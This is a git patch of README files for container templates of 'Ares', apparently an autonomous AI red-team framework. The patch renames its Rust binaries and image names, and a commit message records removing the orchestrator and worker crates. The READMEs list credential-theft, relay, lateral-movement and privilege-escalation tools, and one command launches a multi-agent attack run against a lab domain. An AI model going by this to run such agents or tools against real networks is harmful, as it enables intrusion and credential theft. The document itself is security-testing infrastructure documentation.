ares-rust-blue-triage-agent:latest --version ``` --- ## Installed Tools -- **ares-worker** - Rust-compiled worker binary with PyO3 Python bindings +- **ares** - Rust-compiled binary with PyO3 Python bindings - **mcp-grafana** - Grafana MCP server for observability integration - **Ares Python framework** - Agent orchestration and tool execution @@ -83,28 +83,28 @@ docker run --rm --entrypoint mcp-grafana ares-blue-triage-agent:latest --version - Multi-arch (`amd64` + `arm64`) support - Default user: `root` - Working directory: `/root` - - Entrypoint: `ares-worker` (compiled Rust binary) + - Entrypoint: `ares worker` (compiled Rust binary) - **Installed Components:** - - Provided by `ares-python-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) - - Rust-compiled `ares-worker` binary with PyO3 Python bindings + - Provided by `ares-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) + - Rust-compiled `ares` binary with PyO3 Python bindings - `mcp-grafana` for Grafana observability integration - **Build Process:** - Installs `mcp-grafana` binary (architecture-specific) - Clones ares repository from `feature/rust-cli` branch - Compiles Rust binary with `--features python` for Python interop - - Installs binary to `/usr/local/bin/ares-worker` + - Installs binary to `/usr/local/bin/ares` - Cleans up build artifacts --- ## Differences from ares-blue-triage-agent (Python) -| Component | Python | Rust | -| ----------- | ----------------------------------- | ------------------------------- | -| Entrypoint | `python -m ares --args.multi-agent` | `ares-worker` (binary) | -| Runtime | Python interpreter | Compiled Rust + embedded Python | -| Build | No compilation needed | Rust compilation with PyO3 | -| mcp-grafana | Included | Included | +| Component | Python | Rust | +| ----------- | ---------------------- | ------------------ | +| Entrypoint | `python -m ares --args.multi-agent` | `ares worker` (binary) | +| Runtime | Python interpreter | Compiled Rust + embedded Python | +| Build | No compilation needed | Rust compilation with PyO3 | +| mcp-grafana | Included | Included | --- diff --git a/warpgate-templates/templates/ares-cli/README.md b/warpgate-templates/templates/ares-cli/README.md index 0ef12512..5e169e2f 100644 --- a/warpgate-templates/templates/ares-cli/README.md +++ b/warpgate-templates/templates/ares-cli/README.md @@ -108,18 +108,18 @@ warpgate validate ares-cli - Lightweight base image (`debian:trixie-slim`) - Default user: `root` - Working directory: `/root` - - Entrypoint: `ares-cli` (compiled Rust binary) + - Entrypoint: `ares` (compiled Rust binary) - **Installed Components:** - - Pure Rust `ares-cli` binary (no Python dependencies) + - Pure Rust `ares` binary (no Python dependencies) - **Build Process:** - Clones ares repository from `feature/rust-cli` branch - Installs Rust toolchain and build dependencies - - Compiles binary with `cargo build --release --bin ares-cli` - - Installs binary to `/usr/local/bin/ares-cli` + - Compiles binary with `cargo build --release --bin ares` + - Installs binary to `/usr/local/bin/ares` - Cleans up Rust toolchain, build artifacts, and build-only dependencies - **Directory Structure:** - `/root/` - Default working directory - - `/usr/local/bin/ares-cli` - Compiled CLI binary + - `/usr/local/bin/ares` - Compiled Ares binary --- diff --git a/warpgate-templates/templates/ares-coercion-agent/README.md b/warpgate-templates/templates/ares-coercion-agent/README.md index 80b1e44f..f0bcf317 100644 --- a/warpgate-templates/templates/ares-coercion-agent/README.md +++ b/warpgate-templates/templates/ares-coercion-agent/README.md @@ -103,7 +103,7 @@ warpgate validate ares-coercion-agent - `ares_coercion_tools` - Responder, mitm6, Coercer, PetitPotam - **Rust Binary:** - Compiled from `feature/rust-cli` branch with PyO3 Python bindings - - Installed to `/usr/local/bin/ares-worker` + - Installed to `/usr/local/bin/ares` - **Installed Tools:** - **Responder** - LLMNR/NBT-NS/mDNS poisoning for credential capture - **mitm6** - DHCPv6 poisoning for IPv6 MITM attacks @@ -114,7 +114,7 @@ warpgate validate ares-coercion-agent - `/ares/.venv/` - Python virtual environment - `/opt/Responder/` - Responder installation - `/opt/PetitPotam/` - PetitPotam installation - - `/usr/local/bin/ares-worker` - Compiled worker binary + - `/usr/local/bin/ares` - Compiled Ares binary - The build includes cleanup steps to remove temporary files, Ansible artifacts, and Rust build artifacts. --- diff --git a/warpgate-templates/templates/ares-cracker-agent-gpu/README.md b/warpgate-templates/templates/ares-cracker-agent-gpu/README.md index 2a78262d..6f0670af 100644 --- a/warpgate-templates/templates/ares-cracker-agent-gpu/README.md +++ b/warpgate-templates/templates/ares-cracker-agent-gpu/README.md @@ -1,6 +1,6 @@ -# Ares Cracker Agent GPU Warp Gate Template +# Ares Rust Cracker Agent GPU Warp Gate Template -This template builds **Ares Cracker Agent GPU** images using Warp Gate. It provides +This template builds **Ares Rust Cracker Agent GPU** images using Warp Gate. It provides GPU-accelerated password cracking using hashcat with CUDA/OpenCL support for NVIDIA GPUs, using a compiled Rust binary with embedded Python. @@ -30,13 +30,13 @@ This image is built on the NVIDIA CUDA runtime image and supports: To run the container with GPU access: ```bash -docker run --gpus all -it ghcr.io/dreadnode/ares-cracker-agent-gpu:latest +docker run --gpus all -it ghcr.io/dreadnode/ares-rust-cracker-agent-gpu:latest ``` Or with specific GPUs: ```bash -docker run --gpus '"device=0,1"' -it ghcr.io/dreadnode/ares-cracker-agent-gpu:latest +docker run --gpus '"device=0,1"' -it ghcr.io/dreadnode/ares-rust-cracker-agent-gpu:latest ``` ### Verifying GPU Access @@ -54,7 +54,7 @@ clinfo hashcat -I # Verify the Rust binary -ares-worker --version +ares worker --version ``` --- @@ -63,7 +63,7 @@ ares-worker --version The template configuration is managed in `warpgate.yaml`. Key settings include: -- `name`: Template name (`ares-cracker-agent-gpu`) +- `name`: Template name (`ares-rust-cracker-agent-gpu`) - `base.image`: Base Docker image (`ares-cracker-base-gpu`) - `sources`: Clones the ares repository for Rust compilation - `targets`: Defines build targets (container images) @@ -72,18 +72,18 @@ The template configuration is managed in `warpgate.yaml`. Key settings include: ## Building Docker Images -This builds GPU-accelerated Ares Cracker Agent Docker images for `amd64` architecture. +This builds GPU-accelerated Ares Rust Cracker Agent Docker images for `amd64` architecture. **Initialize the template:** ```bash -warpgate init ares-cracker-agent-gpu +warpgate init ares-rust-cracker-agent-gpu ``` **Build Docker images:** ```bash -warpgate build ares-cracker-agent-gpu --only 'docker.*' +warpgate build ares-rust-cracker-agent-gpu --only 'docker.*' ``` **Build with registry push:** @@ -93,16 +93,17 @@ cd /path/to/warpgate-templates export GITHUB_TOKEN="your-github-token" -warpgate build --template ares-cracker-agent-gpu \ +warpgate build --template ares-rust-cracker-agent-gpu \ --arch amd64 \ --registry ghcr.io/dreadnode \ --tag latest \ --push \ - --cache-from type=registry,ref=ghcr.io/dreadnode/ares-cracker-agent-gpu:buildcache-amd64 \ - --cache-to type=registry,ref=ghcr.io/dreadnode/ares-cracker-agent-gpu:buildcache-amd64,mode=max + --cache-from type=registry,ref=ghcr.io/dreadnode/ares-rust-cracker-agent-gpu:buildcache-amd64 \ + --cache-to type=registry,ref=ghcr.io/dreadnode/ares-rust-cracker-agent-gpu:buildcache-amd64,mode=max ``` -After the build, Ares Cracker Agent GPU Docker images will be available +After the build, Ares Rust Cracker Agent GPU Docker images will be available +locally as `ares-rust-cracker-agent-gpu:latest`. --- @@ -112,17 +113,17 @@ After the build, Ares Cracker Agent GPU Docker images will be available - **John the Ripper** - Classic password cracker - **rockyou.txt** - Famous password wordlist - **SecLists passwords** - Common password lists -- **ares-worker** - Rust-compiled binary with PyO3 Python bindings +- **ares** - Rust-compiled binary with PyO3 Python bindings - **Ares Python framework** - Agent orchestration and tool execution --- ## CPU vs GPU Comparison -| Image | GPU Support | Use Case | -| ------------------------ | --------------- | -------------------------------- | -| `ares-cracker-agent` | CPU only (PoCL) | CI/CD, testing, ARM support | -| `ares-cracker-agent-gpu` | CUDA/OpenCL | Production cracking, NVIDIA GPUs | +| Image | GPU Support | Use Case | +|--------------------------------|------------------|-----------------------------------| +| `ares-rust-cracker-agent` | CPU only (PoCL) | CI/CD, testing, ARM support | +| `ares-rust-cracker-agent-gpu` | CUDA/OpenCL | Production cracking, NVIDIA GPUs | --- @@ -139,24 +140,24 @@ After the build, Ares Cracker Agent GPU Docker images will be available - `NVIDIA_DRIVER_CAPABILITIES=compute,utility` - CUDA and OpenCL runtime support - **Installed Components:** - - Provided by `ares-python-cracker-base-gpu` (hashcat, john, wordlists, CUDA runtime) - - Rust-compiled `ares-worker` binary with PyO3 Python bindings + - Provided by `ares-cracker-base-gpu` (hashcat, john, wordlists, CUDA runtime) + - Rust-compiled `ares` binary with PyO3 Python bindings - Ares Python framework - **Build Process:** - Clones ares repository from `feature/rust-cli` branch - Installs Rust toolchain, compiles binary with `--features python` - - Installs binary to `/usr/local/bin/ares-worker` + - Installs binary to `/usr/local/bin/ares` - Cleans up Rust toolchain, build artifacts, and build-only dependencies - **Directory Structure:** - `/root/` - Default working directory - - `/usr/local/bin/ares-worker` - Compiled worker binary + - `/usr/local/bin/ares` - Compiled Ares binary - `/usr/share/wordlists/` - Wordlist collection - `/usr/share/hashcat/rules/` - Hashcat rules - **Architecture**: Only `amd64` is supported (NVIDIA CUDA not available for ARM) - **Memory**: GPU cracking may require significant VRAM for large wordlists - **Kubernetes**: Use NVIDIA device plugin for GPU scheduling -For CPU-only cracking, use the `ares-cracker-agent` template instead. +For CPU-only cracking, use the `ares-rust-cracker-agent` template instead. --- diff --git a/warpgate-templates/templates/ares-cracker-agent/README.md b/warpgate-templates/templates/ares-cracker-agent/README.md index 40e37370..9c5eec4b 100644 --- a/warpgate-templates/templates/ares-cracker-agent/README.md +++ b/warpgate-templates/templates/ares-cracker-agent/README.md @@ -103,7 +103,7 @@ warpgate validate ares-cracker-agent - `ares_cracking_tools` - hashcat, john, wordlists - **Rust Binary:** - Compiled from `feature/rust-cli` branch with PyO3 Python bindings - - Installed to `/usr/local/bin/ares-worker` + - Installed to `/usr/local/bin/ares` - **Installed Tools:** - **hashcat** - Industry-leading password recovery tool - **John the Ripper** - Classic password cracker with extensive format support @@ -118,7 +118,7 @@ warpgate validate ares-cracker-agent - `/ares/results/` - Cracking results storage - `/usr/share/wordlists/` - Wordlist collection - `/usr/share/hashcat/rules/` - Hashcat rules - - `/usr/local/bin/ares-worker` - Compiled worker binary + - `/usr/local/bin/ares` - Compiled Ares binary - The build includes cleanup steps to remove temporary files, Ansible artifacts, and Rust build artifacts. --- diff --git a/warpgate-templates/templates/ares-credential-access-agent/README.md b/warpgate-templates/templates/ares-credential-access-agent/README.md index ab30aaae..160fb734 100644 --- a/warpgate-templates/templates/ares-credential-access-agent/README.md +++ b/warpgate-templates/templates/ares-credential-access-agent/README.md @@ -102,7 +102,7 @@ warpgate validate ares-credential-access-agent - `ares_credential_access_tools` - Kerberos and credential tools - **Rust Binary:** - Compiled from `feature/rust-cli` branch with PyO3 Python bindings - - Installed to `/usr/local/bin/ares-worker` + - Installed to `/usr/local/bin/ares` - **Installed Tools:** - **Kerberos Tools** - Rubeus, GetNPUsers, GetUserSPNs for Kerberoasting and AS-REP roasting - **Impacket** - secretsdump, ntlmrelayx for credential extraction @@ -111,7 +111,7 @@ warpgate validate ares-credential-access-agent - **Directory Structure:** - `/ares/` - Main Ares workspace directory - `/ares/.venv/` - Python virtual environment - - `/usr/local/bin/ares-worker` - Compiled worker binary + - `/usr/local/bin/ares` - Compiled Ares binary - The build includes cleanup steps to remove temporary files, Ansible artifacts, and Rust build artifacts. --- diff --git a/warpgate-templates/templates/ares-lateral-movement-agent/README.md b/warpgate-templates/templates/ares-lateral-movement-agent/README.md index a446abba..733ac81c 100644 --- a/warpgate-templates/templates/ares-lateral-movement-agent/README.md +++ b/warpgate-templates/templates/ares-lateral-movement-agent/README.md @@ -102,7 +102,7 @@ warpgate validate ares-lateral-movement-agent - `ares_lateral_movement_tools` - evil-winrm, lsassy, xfreerdp, sshpass - **Rust Binary:** - Compiled from `feature/rust-cli` branch with PyO3 Python bindings - - Installed to `/usr/local/bin/ares-worker` + - Installed to `/usr/local/bin/ares` - **Installed Tools:** - **evil-winrm** - WinRM shell with pass-the-hash support - **lsassy** - Remote LSASS credential extraction @@ -111,7 +111,7 @@ warpgate validate ares-lateral-movement-agent - **Directory Structure:** - `/ares/` - Main Ares workspace directory - `/ares/.venv/` - Python virtual environment - - `/usr/local/bin/ares-worker` - Compiled worker binary + - `/usr/local/bin/ares` - Compiled Ares binary - The build includes cleanup steps to remove temporary files, Ansible artifacts, and Rust build artifacts. --- diff --git a/warpgate-templates/templates/ares-orchestrator/README.md b/warpgate-templates/templates/ares-orchestrator/README.md index 2aa904f4..ebe2210c 100644 --- a/warpgate-templates/templates/ares-orchestrator/README.md +++ b/warpgate-templates/templates/ares-orchestrator/README.md @@ -1,6 +1,6 @@ -# Ares Orchestrator Warp Gate Template +# Ares Rust Orchestrator Warp Gate Template -This template builds **Ares Orchestrator** images using Warp Gate. The +This template builds **Ares Rust Orchestrator** images using Warp Gate. The orchestrator coordinates multi-agent red team operations, dispatching tasks to specialized worker agents via Redis, using a compiled Rust binary with embedded Python for LLM agent steps. @@ -21,7 +21,7 @@ Python for LLM agent steps. The template configuration is managed in `warpgate.yaml`. Key settings include: -- `name`: Template name (`ares-orchestrator`) +- `name`: Template name (`ares-rust-orchestrator`) - `base.image`: Base Docker image (Python 3.13.7 slim) - `sources`: Clones the ares repository for Rust compilation - `provisioners`: File and shell provisioners for setup @@ -31,30 +31,30 @@ The template configuration is managed in `warpgate.yaml`. Key settings include: ## Building Docker Images -This builds **Ares Orchestrator** Docker images for `amd64` and `arm64` +This builds **Ares Rust Orchestrator** Docker images for `amd64` and `arm64` architectures, compiles the Rust orchestrator binary with Python bindings, and configures it for multi-agent operations. **Initialize the template:** ```bash -warpgate init ares-orchestrator +warpgate init ares-rust-orchestrator ``` **Build Docker images:** ```bash -warpgate build ares-orchestrator --only 'docker.*' +warpgate build ares-rust-orchestrator --only 'docker.*' ``` **Build for specific architecture:** ```bash -warpgate build ares-orchestrator --arch amd64 --only 'docker.*' +warpgate build ares-rust-orchestrator --arch amd64 --only 'docker.*' ``` -After the build, Ares Orchestrator Docker images will be available -locally as `ares-orchestrator:latest`. +After the build, Ares Rust Orchestrator Docker images will be available +locally as `ares-rust-orchestrator:latest`. --- @@ -64,13 +64,13 @@ After building the Docker image, you can push it to GHCR: ```bash # Tag the image -docker tag ares-orchestrator:latest ghcr.io/dreadnode/ares-orchestrator:latest +docker tag ares-rust-orchestrator:latest ghcr.io/dreadnode/ares-rust-orchestrator:latest # Authenticate with GHCR echo $GITHUB_TOKEN | docker login ghcr.io -u YOUR_USERNAME --password-stdin # Push the image -docker push ghcr.io/dreadnode/ares-orchestrator:latest +docker push ghcr.io/dreadnode/ares-rust-orchestrator:latest ``` --- @@ -87,17 +87,17 @@ docker run -it --rm \ -e REDIS_URL="redis://localhost:6379" \ -e ANTHROPIC_API_KEY="your-api-key" \ --entrypoint /bin/bash \ - ares-orchestrator:latest + ares-rust-orchestrator:latest ``` **Verify the orchestrator is installed correctly:** ```bash # Check the Rust binary is available -docker run --rm --entrypoint ares-orchestrator ares-orchestrator:latest --version +docker run --rm --entrypoint ares ares-rust-orchestrator:latest orchestrator --version # Check that curl and jq are installed (for debugging) -docker run --rm --entrypoint bash ares-orchestrator:latest -c "curl --version && jq --version" +docker run --rm --entrypoint bash ares-rust-orchestrator:latest -c "curl --version && jq --version" ``` **Test with local Redis:** @@ -112,7 +112,7 @@ docker run -it --rm \ -e REDIS_URL="redis://localhost:6379" \ -e ANTHROPIC_API_KEY="your-api-key" \ -e ARES_NAMESPACE="default" \ - ares-orchestrator:latest + ares-rust-orchestrator:latest ``` --- @@ -122,7 +122,7 @@ docker run -it --rm \ To validate the template configuration before building: ```bash -warpgate validate ares-orchestrator +warpgate validate ares-rust-orchestrator ``` --- @@ -133,17 +133,17 @@ The orchestrator is designed to run as a long-lived pod in Kubernetes. Deploy using the manifests in the argonaut repository: ```bash -kubectl apply -k environments/dev/platforms/attack-simulation/ares-orchestrator +kubectl apply -k environments/dev/platforms/attack-simulation/ares-rust-orchestrator ``` Then exec into the pod to run operations: ```bash # Get a shell in the orchestrator pod -kubectl exec -it -n attack-simulation deploy/ares-orchestrator -- bash +kubectl exec -it -n attack-simulation deploy/ares-rust-orchestrator -- bash # Run a multi-agent operation -ares-orchestrator multi-agent sevenkingdoms.local "192.168.56.10,192.168.56.11" +ares orchestrator multi-agent sevenkingdoms.local "192.168.56.10,192.168.56.11" ``` The pod has the following environment variables pre-configured: @@ -160,21 +160,21 @@ The pod has the following environment variables pre-configured: - Multi-arch (`amd64` + `arm64`) support - Default user: `root` - Working directory: `/root` - - Entrypoint: `ares-orchestrator` (compiled Rust binary) + - Entrypoint: `ares orchestrator` (compiled Rust binary) - **Installed Components:** - Python 3.13.7 - uv package manager - Ares framework (installed from source via pip) - - Rust-compiled `ares-orchestrator` binary with PyO3 Python bindings + - Rust-compiled `ares` binary with PyO3 Python bindings - curl and jq for debugging - **Build Process:** - Clones ares repository from `feature/rust-cli` branch - Installs Rust toolchain, compiles binary with `--features python` - - Installs binary to `/usr/local/bin/ares-orchestrator` + - Installs binary to `/usr/local/bin/ares` - Cleans up Rust toolchain, build artifacts, and build-only dependencies - **Directory Structure:** - `/root/` - Default working directory - - `/usr/local/bin/ares-orchestrator` - Compiled orchestrator binary + - `/usr/local/bin/ares` - Compiled Ares binary - Python packages installed system-wide - The orchestrator requires Redis, an Anthropic API key, and access to worker agents to function. @@ -182,13 +182,13 @@ The pod has the following environment variables pre-configured: ## Differences from ares-orchestrator (Python) -| Component | ares-orchestrator (Python) | ares-orchestrator | -| ----------- | -------------------------- | ------------------------------- | -| Entrypoint | `/bin/bash` | `ares-orchestrator` (binary) | -| Runtime | Python interpreter | Compiled Rust + embedded Python | -| Build | pip install only | Rust compilation with PyO3 | -| Performance | Standard Python | Native Rust with Python FFI | -| Extra Tools | curl, jq | curl, jq | +| Component | ares-orchestrator (Python) | ares-rust-orchestrator | +| ----------- | ---------------------------- | ------------------------ | +| Entrypoint | `/bin/bash` | `ares orchestrator` (binary) | +| Runtime | Python interpreter | Compiled Rust + embedded Python | +| Build | pip install only | Rust compilation with PyO3 | +| Performance | Standard Python | Native Rust with Python FFI | +| Extra Tools | curl, jq | curl, jq | --- diff --git a/warpgate-templates/templates/ares-privesc-agent/README.md b/warpgate-templates/templates/ares-privesc-agent/README.md index b0fa4daa..090c9838 100644 --- a/warpgate-templates/templates/ares-privesc-agent/README.md +++ b/warpgate-templates/templates/ares-privesc-agent/README.md @@ -103,7 +103,7 @@ warpgate validate ares-privesc-agent - `ares_privesc_tools` - Comprehensive privilege escalation toolkit - **Rust Binary:** - Compiled from `feature/rust-cli` branch with PyO3 Python bindings - - Installed to `/usr/local/bin/ares-worker` + - Installed to `/usr/local/bin/ares` - **Installed Tools:** **Potato Exploits (SeImpersonatePrivilege):** @@ -144,7 +144,7 @@ warpgate validate ares-privesc-agent - `/opt/privesc/RunasCs/` - `/opt/privesc/noPac/` - `/opt/privesc/PrintNightmare/` - - `/usr/local/bin/ares-worker` - Compiled worker binary + - `/usr/local/bin/ares` - Compiled Ares binary - The build includes cleanup steps to remove temporary files, Ansible artifacts, and Rust build artifacts. --- diff --git a/warpgate-templates/templates/ares-recon-agent/README.md b/warpgate-templates/templates/ares-recon-agent/README.md index 7d3368ad..3ca588d2 100644 --- a/warpgate-templates/templates/ares-recon-agent/README.md +++ b/warpgate-templates/templates/ares-recon-agent/README.md @@ -104,7 +104,7 @@ warpgate validate ares-recon-agent - `ares_recon_tools` - nmap, netexec, impacket, bloodhound, certipy, rpcclient - **Rust Binary:** - Compiled from `feature/rust-cli` branch with PyO3 Python bindings - - Installed to `/usr/local/bin/ares-worker` + - Installed to `/usr/local/bin/ares` - **Installed Tools:** - **Network:** nmap, smbclient, ldap-utils, dnsutils, netcat - **AD Recon:** netexec, impacket, bloodhound-python, certipy @@ -113,7 +113,7 @@ warpgate validate ares-recon-agent - `/ares/.venv/` - Python virtual environment - `/ares/agents/` - Agent storage directory - `/ares/data/` - Data storage directory - - `/usr/local/bin/ares-worker` - Compiled worker binary + - `/usr/local/bin/ares` - Compiled Ares binary - The build includes cleanup steps to remove temporary files, Ansible artifacts, and Rust build artifacts. --- diff --git a/warpgate-templates/templates/ares-worker/README.md b/warpgate-templates/templates/ares-worker/README.md index b0b7b071..a6a681c7 100644 --- a/warpgate-templates/templates/ares-worker/README.md +++ b/warpgate-templates/templates/ares-worker/README.md @@ -1,6 +1,6 @@ -# Ares Worker Warp Gate Template +# Ares Rust Worker Warp Gate Template -This template builds **Ares Worker** images using Warp Gate. It supports +This template builds **Ares Rust Worker** images using Warp Gate. It supports building **Docker images** (for `amd64` and `arm64`). The worker agent polls Redis for tasks and orchestrates tool execution across the Ares framework, using a compiled Rust binary with embedded Python for LLM agent steps. @@ -21,7 +21,7 @@ using a compiled Rust binary with embedded Python for LLM agent steps. The template configuration is managed in `warpgate.yaml`. Key settings include: -- `name`: Template name (`ares-worker`) +- `name`: Template name (`ares-rust-worker`) - `base.image`: Base Docker image (`ares-base`) - `sources`: Clones the ares repository for Rust compilation - `targets`: Defines build targets (container images) @@ -30,30 +30,30 @@ The template configuration is managed in `warpgate.yaml`. Key settings include: ## Building Docker Images -This builds **Ares Worker** Docker images for `amd64` and `arm64` +This builds **Ares Rust Worker** Docker images for `amd64` and `arm64` architectures, compiles the Rust worker binary with Python bindings, and configures it as a long-running worker daemon. **Initialize the template:** ```bash -warpgate init ares-worker +warpgate init ares-rust-worker ``` **Build Docker images:** ```bash -warpgate build ares-worker --only 'docker.*' +warpgate build ares-rust-worker --only 'docker.*' ``` **Build for specific architecture:** ```bash -warpgate build ares-worker --arch amd64 --only 'docker.*' +warpgate build ares-rust-worker --arch amd64 --only 'docker.*' ``` -After the build, Ares Worker Docker images will be available -locally as `ares-worker:latest`. +After the build, Ares Rust Worker Docker images will be available +locally as `ares-rust-worker:latest`. --- @@ -63,13 +63,13 @@ After building the Docker image, you can push it to GHCR: ```bash # Tag the image -docker tag ares-worker:latest ghcr.io/dreadnode/ares-worker:latest +docker tag ares-rust-worker:latest ghcr.io/dreadnode/ares-rust-worker:latest # Authenticate with GHCR echo $GITHUB_TOKEN | docker login ghcr.io -u YOUR_USERNAME --password-stdin # Push the image -docker push ghcr.io/dreadnode/ares-worker:latest +docker push ghcr.io/dreadnode/ares-rust-worker:latest ``` --- @@ -85,14 +85,14 @@ After building the image, you can test it locally: docker run -it --rm \ -e REDIS_URL="redis://localhost:6379" \ -e ANTHROPIC_API_KEY="your-api-key" \ - ares-worker:latest + ares-rust-worker:latest ``` **Verify the worker is installed correctly:** ```bash # Check the Rust binary is available -docker run --rm ares-worker:latest ares-worker --version +docker run --rm ares-rust-worker:latest ares worker --version ``` **Test with local Redis:** @@ -106,14 +106,14 @@ docker run -it --rm \ --network host \ -e REDIS_URL="redis://localhost:6379" \ -e ANTHROPIC_API_KEY="your-api-key" \ - ares-worker:latest + ares-rust-worker:latest ``` **Verify health check commands work:** ```bash # Test that pgrep is available (for Kubernetes probes) -docker run --rm ares-worker:latest pgrep -V +docker run --rm ares-rust-worker:latest pgrep -V ``` --- @@ -123,7 +123,7 @@ docker run --rm ares-worker:latest pgrep -V To validate the template configuration before building: ```bash -warpgate validate ares-worker +warpgate validate ares-rust-worker ``` --- @@ -134,18 +134,18 @@ warpgate validate ares-worker - Multi-arch (`amd64` + `arm64`) support - Default user: `root` - Working directory: `/root` - - Entrypoint: `ares-worker` (compiled Rust binary) + - Entrypoint: `ares worker` (compiled Rust binary) - **Installed Components:** - - Provided by `ares-python-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) - - Rust-compiled `ares-worker` binary with PyO3 Python bindings + - Provided by `ares-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) + - Rust-compiled `ares` binary with PyO3 Python bindings - **Build Process:** - Clones ares repository from `feature/rust-cli` branch - Compiles Rust binary with `--features python` for Python interop - - Installs binary to `/usr/local/bin/ares-worker` + - Installs binary to `/usr/local/bin/ares` - Cleans up build artifacts (source, compiler symlinks) - **Directory Structure:** - `/root/` - Default working directory - - `/usr/local/bin/ares-worker` - Compiled worker binary + - `/usr/local/bin/ares` - Compiled Ares binary - Python packages installed system-wide - The worker requires Redis and an Anthropic API key to function. @@ -162,7 +162,7 @@ livenessProbe: command: - /bin/sh - -c - - pgrep -f 'ares-worker' + - pgrep -f 'ares worker' initialDelaySeconds: 30 periodSeconds: 10 ``` @@ -170,19 +170,19 @@ livenessProbe: Deploy using the manifests in the argonaut repository: ```bash -kubectl apply -k environments/dev/platforms/attack-simulation/ares-worker +kubectl apply -k environments/dev/platforms/attack-simulation/ares-rust-worker ``` --- ## Differences from ares-worker (Python) -| Component | ares-worker (Python) | ares-worker | -| ----------- | ----------------------- | ------------------------------- | -| Entrypoint | `python -m ares worker` | `ares-worker` (binary) | -| Runtime | Python interpreter | Compiled Rust + embedded Python | -| Build | No compilation needed | Rust compilation with PyO3 | -| Performance | Standard Python | Native Rust with Python FFI | +| Component | ares-worker (Python) | ares-rust-worker | +| ----------- | ---------------------- | ------------------ | +| Entrypoint | `python -m ares worker` | `ares worker` (binary) | +| Runtime | Python interpreter | Compiled Rust + embedded Python | +| Build | No compilation needed | Rust compilation with PyO3 | +| Performance | Standard Python | Native Rust with Python FFI | --- From 5994d185bcf07e29fc61fdc054fa34670cf128c2 Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 17 Apr 2026 10:59:41 -0600 Subject: [PATCH 05/10] refactor: remove ares-orchestrator and ares-worker crates and all source files **Removed:** - Deleted the entire `ares-orchestrator` crate, including all Rust source files, configuration, automation logic, state management, result processing, LLM agent loops, blue team investigation orchestrator, and supporting modules - Deleted the entire `ares-worker` crate, including all Rust source files, configuration, task execution loops, tool dispatcher implementations, heartbeat logic, and supporting code - Removed `Cargo.toml` files for both crates, unregistering them from the workspace and eliminating their build configurations and dependencies - Eliminated all code for red team and blue team orchestration, worker task processing, tool execution, Redis-backed state and queue management, and orchestration infrastructure in these components **Changed:** - Project structure no longer includes `ares-orchestrator` or `ares-worker` subdirectories or binaries - All CI, build, and dependency workflows that referenced these crates must be updated to reflect their removal **Why:** - This refactor removes the orchestrator and worker binaries in preparation for a major architecture change, deprecation, or migration to a new orchestration model. All orchestration and agent execution responsibilities previously handled by these Rust components are now removed from the codebase. --- ares-orchestrator/Cargo.toml | 34 - ares-orchestrator/src/automation/acl.rs | 149 ---- ares-orchestrator/src/automation/adcs.rs | 79 -- .../src/automation/bloodhound.rs | 81 -- ares-orchestrator/src/automation/coercion.rs | 78 -- ares-orchestrator/src/automation/crack.rs | 75 -- .../src/automation/credential_access.rs | 479 ----------- .../src/automation/credential_expansion.rs | 410 ---------- .../src/automation/delegation.rs | 103 --- ares-orchestrator/src/automation/gmsa.rs | 145 ---- .../src/automation/golden_ticket.rs | 295 ------- ares-orchestrator/src/automation/mod.rs | 64 -- ares-orchestrator/src/automation/mssql.rs | 94 --- ares-orchestrator/src/automation/refresh.rs | 32 - ares-orchestrator/src/automation/s4u.rs | 354 -------- .../src/automation/secretsdump.rs | 98 --- .../src/automation/share_enum.rs | 106 --- ares-orchestrator/src/automation/shares.rs | 82 -- .../src/automation/stall_detection.rs | 248 ------ ares-orchestrator/src/automation/trust.rs | 448 ----------- .../src/automation/unconstrained.rs | 385 --------- ares-orchestrator/src/automation_spawner.rs | 47 -- ares-orchestrator/src/blue/auto_submit.rs | 246 ------ ares-orchestrator/src/blue/callbacks.rs | 621 --------------- ares-orchestrator/src/blue/chaining.rs | 598 -------------- ares-orchestrator/src/blue/investigation.rs | 572 ------------- ares-orchestrator/src/blue/mod.rs | 19 - ares-orchestrator/src/blue/runner.rs | 403 ---------- ares-orchestrator/src/blue/sub_agent.rs | 142 ---- ares-orchestrator/src/bootstrap.rs | 164 ---- .../src/callback_handler/dispatch.rs | 251 ------ ares-orchestrator/src/callback_handler/mod.rs | 111 --- .../src/callback_handler/query.rs | 318 -------- .../src/callback_handler/tests.rs | 547 ------------- ares-orchestrator/src/completion.rs | 492 ------------ ares-orchestrator/src/config.rs | 365 --------- ares-orchestrator/src/cost_summary.rs | 87 -- ares-orchestrator/src/deferred.rs | 393 --------- ares-orchestrator/src/dispatcher/mod.rs | 132 --- .../src/dispatcher/submission.rs | 450 ----------- .../src/dispatcher/task_builders.rs | 463 ----------- ares-orchestrator/src/exploitation.rs | 196 ----- ares-orchestrator/src/llm_runner.rs | 372 --------- ares-orchestrator/src/main.rs | 753 ------------------ ares-orchestrator/src/monitoring.rs | 471 ----------- .../src/output_extraction/hashes.rs | 308 ------- .../src/output_extraction/hosts.rs | 108 --- .../src/output_extraction/mod.rs | 160 ---- .../src/output_extraction/passwords.rs | 178 ----- .../src/output_extraction/shares.rs | 80 -- .../src/output_extraction/tests.rs | 538 ------------- .../src/output_extraction/users.rs | 148 ---- ares-orchestrator/src/recovery/dedup.rs | 273 ------- ares-orchestrator/src/recovery/manager.rs | 256 ------ ares-orchestrator/src/recovery/mod.rs | 440 ---------- ares-orchestrator/src/recovery/normalize.rs | 171 ---- ares-orchestrator/src/recovery/requeue.rs | 57 -- .../src/recovery/resume_helper.rs | 165 ---- ares-orchestrator/src/recovery/types.rs | 127 --- .../src/result_processing/admin_checks.rs | 328 -------- .../result_processing/discovery_polling.rs | 190 ----- .../src/result_processing/mod.rs | 611 -------------- .../src/result_processing/parsing.rs | 159 ---- .../src/result_processing/tests.rs | 211 ----- .../src/result_processing/timeline.rs | 100 --- ares-orchestrator/src/results.rs | 185 ----- ares-orchestrator/src/routing.rs | 258 ------ ares-orchestrator/src/state/dedup.rs | 69 -- ares-orchestrator/src/state/inner.rs | 377 --------- ares-orchestrator/src/state/mod.rs | 75 -- ares-orchestrator/src/state/persistence.rs | 330 -------- .../src/state/publishing/credentials.rs | 221 ----- .../src/state/publishing/entities.rs | 252 ------ .../src/state/publishing/hosts.rs | 342 -------- .../src/state/publishing/milestones.rs | 156 ---- ares-orchestrator/src/state/publishing/mod.rs | 117 --- 